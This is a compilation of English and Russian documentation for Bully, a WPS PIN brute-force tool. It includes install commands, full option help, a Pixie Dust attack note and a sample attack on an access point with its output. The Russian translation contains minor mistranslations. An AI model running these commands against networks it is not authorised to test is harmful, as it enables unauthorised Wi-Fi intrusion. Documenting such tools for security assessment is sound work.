- Tool Documentation:
- Packages and Binaries:
- bully
- Bully — расширенный аналог Reaver
- Технические требования
- Установка Bully
- Скачайте
- Настройте
- Установите
- Использование bully
- Пример использования Bully
- Оставьте ответ Отменить ответ
- Bully
- Bully Help
- Bully Usage Example
- How to install Bully
- Bully Screenshots
- Bully Tutorials
Tool Documentation:
Attack the wireless ESSID ( -e 6F36E6 ) through the monitor mode interface ( wlan0mon ):
[email protected]:~# bully -e 6F36E6 wlan0mon [!] Bully v1.0-22 - WPS vulnerability assessment utility [X] Unknown frequency '-113135872' reported by interface 'mon0' [!] Using '00:1f:33:f3:51:13' for the source MAC address [+] Datalink type set to '127', radiotap headers present [+] Scanning for beacon from '6F36E6' on channel 'unknown' [+] Got beacon for '6F36E6' (9c:d3:6d:b8:ff:56) [+] Switching interface 'mon0' to channel '8' [!] Beacon information element indicates WPS is locked [!] Creating new randomized pin file '/root/.bully/pins' [+] Index of starting pin number is '0000000' [+] Last State = 'NoAssoc' Next pin '54744431'
Packages and Binaries:
bully
Bully is a new implementation of the WPS brute force attack, written in C. It is conceptually identical to other programs, in that it exploits the (now well known) design flaw in the WPS specification. It has several advantages over the original reaver code. These include fewer dependencies, improved memory and cpu performance, correct handling of endianness, and a more robust set of options.
Installed size: 174 KB
How to install: sudo apt install bully
bully
[email protected]:~# bully -h bully v1.4 the fork that actually works! maintained by kimocoder - https://twitter.com/kimocoder usage: bully interface Required arguments: interface : Wireless interface in monitor mode (root required) -b, --bssid macaddr : MAC address of the target access point Or -e, --essid string : Extended SSID for the access point Optional arguments: -c, --channel N[,N. ] : Channel number of AP, or list to hop [b/g] -i, --index N : Starting pin index (7 or 8 digits) [Auto] -l, --lockwait N : Seconds to wait if the AP locks WPS [43] -o, --outfile file : Output file for messages [stdout] -p, --pin N : Starting pin number (7 or 8 digits) [Auto] -s, --source macaddr : Source (hardware) MAC address [Probe] -u, --lua : Lua script file -v, --verbosity N : Verbosity level 1-4, 1 is quietest [3] -w, --workdir path : Location of pin/session files [~/.bully/] -5, --5ghz : Hop on 5GHz a/n default channel list [No] -B, --bruteforce : Bruteforce the WPS pin checksum digit [No] -F, --force : Force continue in spite of warnings [No] -S, --sequential : Sequential pins (do not randomize) [No] -T, --test : Test mode (do not inject any packets) [No] Advanced arguments: -d, --pixiewps : Attempt to use pixiewps [No] -a, --acktime N : Deprecated/ignored [Auto] -r, --retries N : Resend packets N times when not acked [2] -m, --m13time N : Deprecated/ignored [Auto] -t, --timeout N : Deprecated/ignored [Auto] -1, --pin1delay M,N : Delay M seconds every Nth nack at M5 [0,1] -2, --pin2delay M,N : Delay M seconds every Nth nack at M7 [5,1] -A, --noacks : Disable ACK check for sent packets [No] -C, --nocheck : Skip CRC/FCS validation (performance) [No] -D, --detectlock : Detect WPS lockouts unreported by AP [No] -E, --eapfail : EAP Failure terminate every exchange [No] -L, --lockignore : Ignore WPS locks reported by the AP [No] -M, --m57nack : M5/M7 timeouts treated as WSC_NACK's [No] -N, --nofcs : Packets don't contain the FCS field [Auto] -P, --probe : Use probe request for nonbeaconing AP [No] -Q, --wpsinfo : Use probe request to gather WPS info [No] -R, --radiotap : Assume radiotap headers are present [Auto] -W, --windows7 : Masquerade as a Windows 7 registrar [No] -Z, --suppress : Suppress packet throttling algorithm [No] -V, --version : Print version info and exit -h, --help : Display this help information
Bully — расширенный аналог Reaver
Bully — это новое воплощение WPS атаки методом перебора паролей, расширенный и дополненный аналог Reaver. Программа написана на языке C и концептуально идентична другим программам в использовании ошибок проектирования спецификации WPS. По сравнению с оригинальным кодом аналогичных программ, данная программа имеет несколько преимуществ, таких как:
катагенез зависимостей;
улучшение памяти и времени работы центрального процессора;
правильная обработка порядка следования байтов и более функциональный набор опций.
Программа работает на Linux, и была специально создана для использования на встроенных системах Linux (OpenWrt, и т.д.) без привязки к архитектуре. Bully обеспечивает ряд усовершенствований в обнаружении и обработке аномальных сценариев. Она была успешно протестирована на точках доступа многих производителей, а также с различными конфигурациями.
У вас должна быть уже установлена программа Wiire’s Pixiewps. | Последнюю версию можно найти здесь. |
Технические требования
вызовет установку дополнительных пакетов и библиотек build-essential libpcap-dev libssl-dev aircrack-ng pixiewp
Установка Bully
Скачайте
git clone https://github.com/aanarchyy/bully
wget https://codeload.github.com/aanarchyy/bully/zip/master && unzip master.zip
Настройте
Установите
Использование bully
[email protected]:~# bully -h bully интерфейс Необходимые параметры: Интерфейс : Беспроводной интерфейс в режиме монитора (требуется root) -b, --bssid macaddr : MAC адрес целевой точки доступа Or -e, --essid string : Расширенный SSID для точки доступа Дополнительные параметры: -c, --channel N[,N. ] : Номер канала AP, или список единиц измерения [b/g] -i, --index N : Начальный индекс пина (7 или 8 символов) [Auto] -l, --lockwait N : Секунд для ожидания если AP заблокирован WPS [43] -o, --outfile file : Файл для вывода сообщений [stdout] -p, --pin N : Начальный номер пина (7 или 8 символов) [Auto] -s, --source macaddr : Исходный (железный) MAC адрес [Probe] -v, --verbosity N : Уровень вербальности 1-4, 1 – самый тихий [3] -w, --workdir path : Расположение файлов пина/сессии [~/.bully/] -5, --5ghz : Список каналов по умолчанию для прыжков 5GHz a/n [No] -B, --bruteforce : Контрольная сумма пинов WPS для подбора пароля [No] -F, --force : Принудительно продолжать несмотря на предупреждения [No] -S, --sequential : Последовательные пины (не рандомизировать) [No] -T, --test : Режим тестирования (не вводить какие-либо пакеты) [No] Продвинутые параметры: -d, --pixiewps : Попытка использования pixiewps [No] -a, --acktime N : Устаревшая/игнорируемая [Auto] -r, --retries N : Повторная отправка пакетов N раз, когда нет подтверждения [2] -m, --m13time N : Устаревшая/игнорируемая [Auto] -t, --timeout N : Устаревшая/игнорируемая [Auto] -1, --pin1delay M,N : Задержка M секунд каждое N не подтверждение в M5 [0,1] -2, --pin2delay M,N : Задержка M секунд каждое N не подтверждение в M7 [5,1] -A, --noacks : Отключить проверку ACK для отправляемых пакетов [No] -C, --nocheck : Пропустить валидацию CRC/FCS (производительность) [No] -D, --detectlock : Выявить WPS блокировки, о которых не сообщает AP [No] -E, --eapfail : EAP Failure после каждой отправки [No] -L, --lockignore : Игнорировать WPS блокировки, о которых сообщает AP [No] -M, --m57nack : M5/M7 таймаут рассматриваемый как WSC_NACK's [No] -N, --nofcs : Пакеты не содержат поле FCS [Auto] -P, --probe : Использовать запросы зондирования для AP [No] -R, --radiotap : Предположительно, что заголовки radio tap присутствуют [Auto] -W, --windows7 : Делать вид, что регистрируется Windows 7 [No] -Z, --suppress : Подавлять алгоритм тротинга пакетов [No] -V, --version : Напечатать версию и выйти -h, --help : Напечатать эту справку
Опция -d выполняет автономную атаку, Pixie Dust (pixiewps), автоматически передавая PKE, PKR, E-Hash1, E-Hash2, E-Nonce и Authkey, pixiewps будет пытаться атаковать Ralink, Broadcom и Realtek чипсеты.
Опция –v определяет вербальность bully. – v 4 печатает все собранные хэши и выводит команду запустить pixiewps. По умолчанию уровень запуска 3.
Пример использования Bully
Атака беспроводной сети ESSID (-е 6F36E6) с использованием интерфейса режима монитора (mon0) :
[email protected]:~# bully -e 6F36E6 mon0 [!] Bully v1.0-22 - оценка уязвимости WPS [X] Неизвестная частота '-113135872' сообщает интерфейсу 'mon0' [!] Использование '00:1f:33:f3:51:13' для источника MAC - адресов [+] Datalink тип установлен в '127 ', показывает заголовки [+] Опрашиваем '6F36E6' на канале 'неизвестно' [+] Получил ответ для '6F36E6' (9c:d3:6d:b8:ff:56) [+] Переключение интерфейса 'mon0' для канала '8' [!] Информационный элемент указывает, что WPS заблокирован [!] Создание нового рандомизированного pin - файла '/root/.bully/pins' [+] Индекс исходного pin '0000000' [+] Последний статус = 'NoAssoc' Следующий pin '54744431'
При подготовке материала использована информация https://github.com/aanarchyy/bully и http://tools.kali.org/wireless-attacks/bully
Оставьте ответ Отменить ответ
📅 С 20 по 22 апреля пройдут незабываемые битвы среди кибер-гладиаторов в мире информационной безопасности!
Открыта регистрация команд по ссылке .
Bully
Bully is a new implementation of the WPS brute force attack, written in C. It is conceptually identical to other programs, in that it exploits the (now well known) design flaw in the WPS specification. It has several advantages over the original reaver code. These include fewer dependencies, improved memory and cpu performance, correct handling of endianness, and a more robust set of options. It runs on Linux, and was specifically developed to run on embedded Linux systems (OpenWrt, etc) regardless of architecture.
Bully provides several improvements in the detection and handling of anomalous scenarios. It has been tested against access points from numerous vendors, and with differing configurations, with much success.
Bully Help
Required arguments: interface : Wireless interface in monitor mode (root required) -b, --bssid macaddr : MAC address of the target access point Or -e, --essid string : Extended SSID for the access point Optional arguments: -c, --channel N[,N. ] : Channel number of AP, or list to hop [b/g] -i, --index N : Starting pin index (7 or 8 digits) [Auto] -l, --lockwait N : Seconds to wait if the AP locks WPS [43] -o, --outfile file : Output file for messages [stdout] -p, --pin N : Starting pin number (7 or 8 digits) [Auto] -s, --source macaddr : Source (hardware) MAC address [Probe] -v, --verbosity N : Verbosity level 1-4, 1 is quietest [3] -w, --workdir path : Location of pin/session files [~/.bully/] -5, --5ghz : Hop on 5GHz a/n default channel list [No] -B, --bruteforce : Bruteforce the WPS pin checksum digit [No] -F, --force : Force continue in spite of warnings [No] -S, --sequential : Sequential pins (do not randomize) [No] -T, --test : Test mode (do not inject any packets) [No] Advanced arguments: -d, --pixiewps : Attempt to use pixiewps [No] -a, --acktime N : Deprecated/ignored [Auto] -r, --retries N : Resend packets N times when not acked [2] -m, --m13time N : Deprecated/ignored [Auto] -t, --timeout N : Deprecated/ignored [Auto] -1, --pin1delay M,N : Delay M seconds every Nth nack at M5 [0,1] -2, --pin2delay M,N : Delay M seconds every Nth nack at M7 [5,1] -A, --noacks : Disable ACK check for sent packets [No] -C, --nocheck : Skip CRC/FCS validation (performance) [No] -D, --detectlock : Detect WPS lockouts unreported by AP [No] -E, --eapfail : EAP Failure terminate every exchange [No] -L, --lockignore : Ignore WPS locks reported by the AP [No] -M, --m57nack : M5/M7 timeouts treated as WSC_NACK's [No] -N, --nofcs : Packets don't contain the FCS field [Auto] -P, --probe : Use probe request for nonbeaconing AP [No] -R, --radiotap : Assume radiotap headers are present [Auto] -W, --windows7 : Masquerade as a Windows 7 registrar [No] -Z, --suppress : Suppress packet throttling algorithm [No] -V, --version : Print version info and exit -h, --help : Display this help information
Bully Usage Example
Attack wireless ESSID (-e 6F36E6) with interface in monitor mode (wlan0mon):
bully -e 6F36E6 wlan0mon [!] Bully v1.0-22 - WPS vulnerability assessment utility [X] Unknown frequency '-113135872' reported by interface wlan0mon [!] Using '00:1f:33:f3:51:13' for the source MAC address [+] Datalink type set to '127', radiotap headers present [+] Scanning for beacon from '6F36E6' on channel 'unknown' [+] Got beacon for '6F36E6' (9c:d3:6d:b8:ff:56) [+] Switching interface wlan0mon to channel '8' [!] Beacon information element indicates WPS is locked [!] Creating new randomized pin file '/root/.bully/pins' [+] Index of starting pin number is '0000000' [+] Last State = 'NoAssoc' Next pin '54744431' .
How to install Bully
The program is pre-installed on Kali Linux.
Bully Screenshots
The program is a command-line utility.